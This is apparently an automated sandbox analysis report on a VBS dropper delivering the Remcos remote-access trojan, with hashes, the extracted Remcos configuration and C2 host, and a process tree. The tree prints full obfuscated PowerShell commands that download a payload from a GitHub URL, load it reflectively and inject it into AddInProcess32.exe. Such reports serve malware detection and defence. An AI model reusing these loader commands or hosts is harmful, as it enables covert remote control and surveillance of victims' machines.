Analysis

  • max time kernel
    125s
  • max time network
    122s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags
    arch:x64
    arch:x86
    image:win10-20240404-en
    locale:en-us
    os:windows10-1703-x64
    system
  • submitted
    04/10/2024, 22:21

General

  • Target

    31agosto.vbs

  • Size

    480KB

  • MD5

    b9dbaa8493f8539ec491076723a57f6d

  • SHA1

    c8b7f6625d77483f118ab91aa98a2e612feb714c

  • SHA256

    998c65637736fe8c32b932809868eb2ef60411273bb18d8f389b5f3e1c72ebc2

  • SHA512

    2d4a409d9fe88ac9aad7766db757a19b23ac6cd42650682de6db6d27ed3aa50ca84c7bb8af069458369d662f370c0361cbd4adb54fbebc694b8f7242443787d2

  • SSDEEP

    12288:kn7449lZb/RYfKsB5rGJxzJK37mBQHAIgfBkM0IzpyA22Xjidu2Bw41pk7/rXZ0z:e1Bcxo0

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

exe.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Extracted

Family

remcos

Botnet

RemoteHost

C2

sost2024ene.duckdns.org:1213

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-0AGASP

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell with the display window hidden.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31agosto.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3080
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU52T2tlLWV4UFJlc1NJb04gKCgnTk9mdXJsID0nKycgNVYwaHR0cCcrJ3M6Ly9yYScrJ3cuZ2l0JysnaHUnKydidXNlcmNvJysnbnQnKydlbnQuY29tL05vRGUnKyd0ZWN0T24vTm9EZXRlYycrJ3RPJysnbi9yJysnZWZzL2hlYWRzLycrJ21haW4nKycvRGUnKyd0JysnYWhObycrJ3RoLScrJ1YudCcrJ3h0JysnNVYwJysnOycrJyBOT2ZiYXNlNicrJzQnKydDb250ZW50JysnID0gKE5ldy1PYmonKydlY3QgUycrJ3lzdGVtLicrJ05ldC4nKydXZWJDbGllbnQpLkRvd25sJysnb2EnKydkUycrJ3RyJysnaW5nKE5PZnVybCk7ICcrJ05PZmJpbicrJ2FyeUNvbnRlJysnbnQnKycgPSBbJysnU3lzdGVtJysnLkNvJysnbicrJ3ZlcnRdOjpGJysncm9tQmEnKydzZTY0U3RyaW5nKE5PZmJhJysnc2U2NENvbnRlbnQpOyBOT2ZhcycrJ3NlbScrJ2JseSAnKyc9IFtSZScrJ2YnKydsZWN0aScrJ29uLkFzJysnc2VtYicrJ2x5JysnXTo6TCcrJ29hZChOT2ZiaScrJ25hcicrJ3lDb250ZW4nKyd0KTsgW2QnKydubGliLicrJ0lPJysnLkhvbWVdJysnOjpWQUkoSTJIdHh0JysnLnNvY21lci8nKydzZCcrJ2EnKydvbG53b2QnKycvc2FnY3NlZC8nKydmZGhiJysnZmR6JysnLycrJ2dyby50ZWtjJysndWInKyd0aWIvJysnLzpzcCcrJ3R0aEkySCwgJysnSTJIZCcrJ2VzYXRpdmFkb0kyJysnSCcrJywgSTJIZGVzYScrJ3RpdmFkbycrJ0kySCwgSTJIZGUnKydzYXQnKydpdmFkb0knKycySCcrJywnKycgSTInKydIQWRkSW4nKydQcm9jZScrJ3NzMzJJMkgsICcrJ0kySEkySCxJMkhJMkgpJykucmVQbEFjZSgoW0NoQXJdNTMrW0NoQXJdODYrW0NoQXJdNDgpLFtzVHJpbkddW0NoQXJdMzkpLnJlUGxBY2UoJ0kySCcsW3NUcmluR11bQ2hBcl0zNCkucmVQbEFjZSgoW0NoQXJdNzgrW0NoQXJdNzkrW0NoQXJdMTAyKSxbc1RyaW5HXVtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3560
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INvOke-exPResSIoN (('NOfurl ='+' 5V0http'+'s://ra'+'w.git'+'hu'+'buserco'+'nt'+'ent.com/NoDe'+'tectOn/NoDetec'+'tO'+'n/r'+'efs/heads/'+'main'+'/De'+'t'+'ahNo'+'th-'+'V.t'+'xt'+'5V0'+';'+' NOfbase6'+'4'+'Content'+' = (New-Obj'+'ect S'+'ystem.'+'Net.'+'WebClient).Downl'+'oa'+'dS'+'tr'+'ing(NOfurl); '+'NOfbin'+'aryConte'+'nt'+' = ['+'System'+'.Co'+'n'+'vert]::F'+'romBa'+'se64String(NOfba'+'se64Content); NOfas'+'sem'+'bly '+'= [Re'+'f'+'lecti'+'on.As'+'semb'+'ly'+']::L'+'oad(NOfbi'+'nar'+'yConten'+'t); [d'+'nlib.'+'IO'+'.Home]'+'::VAI(I2Htxt'+'.socmer/'+'sd'+'a'+'olnwod'+'/sagcsed/'+'fdhb'+'fdz'+'/'+'gro.tekc'+'ub'+'tib/'+'/:sp'+'tthI2H, '+'I2Hd'+'esativadoI2'+'H'+', I2Hdesa'+'tivado'+'I2H, I2Hde'+'sat'+'ivadoI'+'2H'+','+' I2'+'HAddIn'+'Proce'+'ss32I2H, '+'I2HI2H,I2HI2H)').rePlAce(([ChAr]53+[ChAr]86+[ChAr]48),[sTrinG][ChAr]39).rePlAce('I2H',[sTrinG][ChAr]34).rePlAce(([ChAr]78+[ChAr]79+[ChAr]102),[sTrinG][ChAr]36))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:956
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          4⤵
          PID:4088
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            PID:1280

    Network

          MITRE ATT&CK Enterprise v15

          Downloads

          • C:\ProgramData\remcos\logs.dat

            Filesize

            144B

            MD5

            6b852c879b52b606404252f5b235c6ce

            SHA1

            2a234a7bff94c30b0d8ddecc9372f5e123d3762d

            SHA256

            25dbb6e89d64fd75843c83d0c13d4bea0fc6ff4365809eb994891a7bee15c4e7

            SHA512

            de4f16ec8e99a19495030b2e61ce290e3412c528239cb1a8acfce55d09319fb816dcd02198ca87e4a9ae50561b066eae1a2e12b905ebd93775bf32a5c2c2d19c

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            3KB

            MD5

            3ebba88045d3c326e606026c8d303313

            SHA1

            5ae1efd7971f053d41cd72de77dbccb102160149

            SHA256

            b76d37f23c570263d214957deef474d0a0fdbc5194fd65d974584e6dc0600825

            SHA512

            ebac584ab568b0bc808643e259651a94d0ace34f6928e5a3857f32ca94ddff77b6b53fa809e9726726f7636874037dccbc440716f40907232455eae5798da367

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            4c4f9de58dd5a985f4384eaa9effc5c6

            SHA1

            d3f347af981edd4b9c972f3dfd2fd8b031f5beb1

            SHA256

            1ad3c60025fd6f80ebd17a07342683cc03e1166c91e2970730b68518db2ae75c

            SHA512

            6844d59ac5ebe1dfb3fbf3da593ac40ef22e29e1391a3e2b26ffca87451240fed3ad28c4a8c51579e9afbf0d809c9dff950f048eb77c1744e72c16ef436f28e7

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xogav1rx.sq4.ps1

            Filesize

            1B

            MD5

            c4ca4238a0b923820dcc509a6f75849b

            SHA1

            356a192b7913b04c54574d18c28d46e6395428ab

            SHA256

            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

            SHA512

            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

          • memory/956-43-0x0000028640B40000-0x0000028640D60000-memory.dmp

            Filesize

            2.1MB

          • memory/1280-51-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/1280-63-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/1280-46-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/1280-50-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/1280-54-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/1280-88-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/1280-80-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/1280-73-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/1280-72-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/1280-60-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/1280-61-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/1280-62-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/3560-0-0x00007FFA2E873000-0x00007FFA2E874000-memory.dmp

            Filesize

            4KB

          • memory/3560-5-0x00000257BCDD0000-0x00000257BCDF2000-memory.dmp

            Filesize

            136KB

          • memory/3560-59-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp

            Filesize

            9.9MB

          • memory/3560-8-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp

            Filesize

            9.9MB

          • memory/3560-10-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp

            Filesize

            9.9MB

          • memory/3560-9-0x00000257BD0B0000-0x00000257BD126000-memory.dmp

            Filesize

            472KB